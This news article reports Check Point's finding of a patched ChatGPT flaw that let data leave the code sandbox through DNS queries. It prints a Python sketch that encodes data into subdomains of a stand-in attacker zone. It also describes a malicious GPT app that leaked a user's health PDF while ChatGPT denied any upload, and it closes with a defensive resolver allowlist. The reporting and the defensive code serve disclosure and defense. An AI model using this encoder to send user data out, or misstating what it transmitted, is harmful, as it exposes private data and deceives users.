OpenAI has patched a critical vulnerability in ChatGPT that allowed data to be smuggled out of the platform through a DNS side channel, bypassing the company's security controls designed to prevent unauthorized data exfiltration.
The flaw, discovered by researchers at Check Point, demonstrated how a single malicious prompt could activate a hidden exfiltration channel within a regular ChatGPT conversation. This vulnerability exposed a significant gap in OpenAI's security architecture, where the system's assumptions about data flow limitations proved incorrect.
How the DNS Side Channel Worked
The vulnerability exploited the Domain Name System (DNS), the protocol that translates domain names into IP addresses. While OpenAI had implemented safeguards to prevent ChatGPT from communicating with the internet without authorization, those controls overlooked DNS lookups as a data exfiltration vector: every name a sandbox resolves is, in effect, an outbound message to whoever runs the authoritative server for that domain.
Check Point researchers explained that ChatGPT's code execution environment was assumed to be unable to generate outbound network requests directly. However, this assumption proved false when data could be transmitted to external servers through DNS queries originating from the container used for code execution and data analysis.
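Check Point has not published the exact encoding it used, but the general DNS-exfiltration technique is well documented: data is chunked, encoded into DNS-safe characters, and smuggled out as subdomain labels of an attacker-controlled zone. The sketch below illustrates the idea; the `exfil.example` zone and the function names are illustrative, not taken from the researchers' proof of concept.

```python
import binascii

MAX_LABEL = 63  # DNS limits each label to 63 bytes (RFC 1035)

def encode_chunks(data: bytes, attacker_domain: str) -> list[str]:
    """Hex-encode data and split it into DNS-safe labels, each
    emitted as a subdomain of the attacker-controlled zone."""
    hexed = binascii.hexlify(data).decode()
    return [
        f"{hexed[i:i + MAX_LABEL]}.{attacker_domain}"
        for i in range(0, len(hexed), MAX_LABEL)
    ]

def decode_chunks(hostnames: list[str], attacker_domain: str) -> bytes:
    """What the attacker reconstructs from their DNS server's query log."""
    suffix = "." + attacker_domain
    hexed = "".join(h[: -len(suffix)] for h in hostnames)
    return binascii.unhexlify(hexed)

# Sandboxed code only has to *resolve* these names (e.g. via
# socket.gethostbyname) for the payload to reach the attacker's
# authoritative DNS server, even with all other egress blocked.
queries = encode_chunks(b"lab result: HbA1c 9.2%", "exfil.example")
```

The key property is that no direct connection to the attacker is ever opened: the recursive resolver inside the sandbox's network does the forwarding, which is why egress controls that only inspect HTTP or block outbound sockets miss it entirely.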
"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," the researchers noted.
Proof-of-Concept Attack Demonstrates Real-World Risk
The security researchers created three proof-of-concept attacks to demonstrate the vulnerability's potential impact. One particularly concerning scenario involved a third-party GPT app functioning as a personal health analyst.
In this demonstration, a user uploaded a PDF containing laboratory results and personal health information for the GPT to interpret. When asked whether it had uploaded the data, ChatGPT confidently responded that it had not, explaining that the file was only stored in a secure internal location. Meanwhile, the GPT app was transmitting the sensitive data to a remote server controlled by the attacker.
This scenario highlights the potential for sophisticated attacks that could compromise regulated industries deploying AI services. A corporate AI service leaking this type of data could constitute violations of GDPR, HIPAA, or various financial compliance rules.
Broader Security Context
The DNS vulnerability discovery comes amid broader scrutiny of ChatGPT's security measures. A recent analysis by a security engineer known as Buchodi suggested that OpenAI has implemented Cloudflare's Turnstile widget to prevent bots from scraping ChatGPT conversations.
According to a post on Hacker News from someone claiming to be an OpenAI employee, these security checks are part of the company's strategy to protect against abuse while maintaining free and logged-out access for legitimate users. The goal is to ensure limited GPU resources are allocated to real users rather than automated scrapers.
This defensive posture reflects the irony of OpenAI's position: having aggregated vast amounts of web content for model training, the company now faces the challenge of preventing others from freely accessing its derivative work.
The Fix and Industry Implications
OpenAI reportedly fixed the DNS data smuggling vulnerability on February 20, 2026. The company did not immediately respond to requests for comment about the security issue.
This incident underscores the ongoing challenges in securing AI platforms against sophisticated data exfiltration techniques. As AI services become more integrated into business operations and handle increasingly sensitive data, the potential impact of such vulnerabilities grows significantly.
For organizations considering AI deployment, this vulnerability serves as a reminder that security controls must be comprehensive and regularly audited. Assumptions about data flow limitations can create dangerous blind spots that sophisticated attackers may exploit.
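One concrete audit item this incident suggests is to treat DNS resolution itself as network egress and restrict which zones sandboxed code may resolve. A minimal sketch of such an allowlist check follows; the zone names are illustrative, and a production deployment would enforce this at the resolver rather than in application code.

```python
def is_allowed(hostname: str, allowlist: set[str]) -> bool:
    """Return True only if hostname is an allowlisted zone or a
    subdomain of one; all other lookups (including attacker zones
    used for DNS exfiltration) are refused."""
    hostname = hostname.rstrip(".").lower()
    return any(
        hostname == zone or hostname.endswith("." + zone)
        for zone in allowlist
    )

ALLOWED = {"openai.com"}  # hypothetical sandbox policy
```

Under this policy, `is_allowed("api.openai.com", ALLOWED)` passes while a lookup such as `deadbeef.exfil.example` is denied, closing the side channel without blocking legitimate resolution.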
The DNS side channel also shows that even major AI providers with substantial security resources can overlook critical attack vectors. Security frameworks for AI platforms will need to evolve accordingly, with particular attention to unconventional exfiltration paths that bypass traditional network controls.

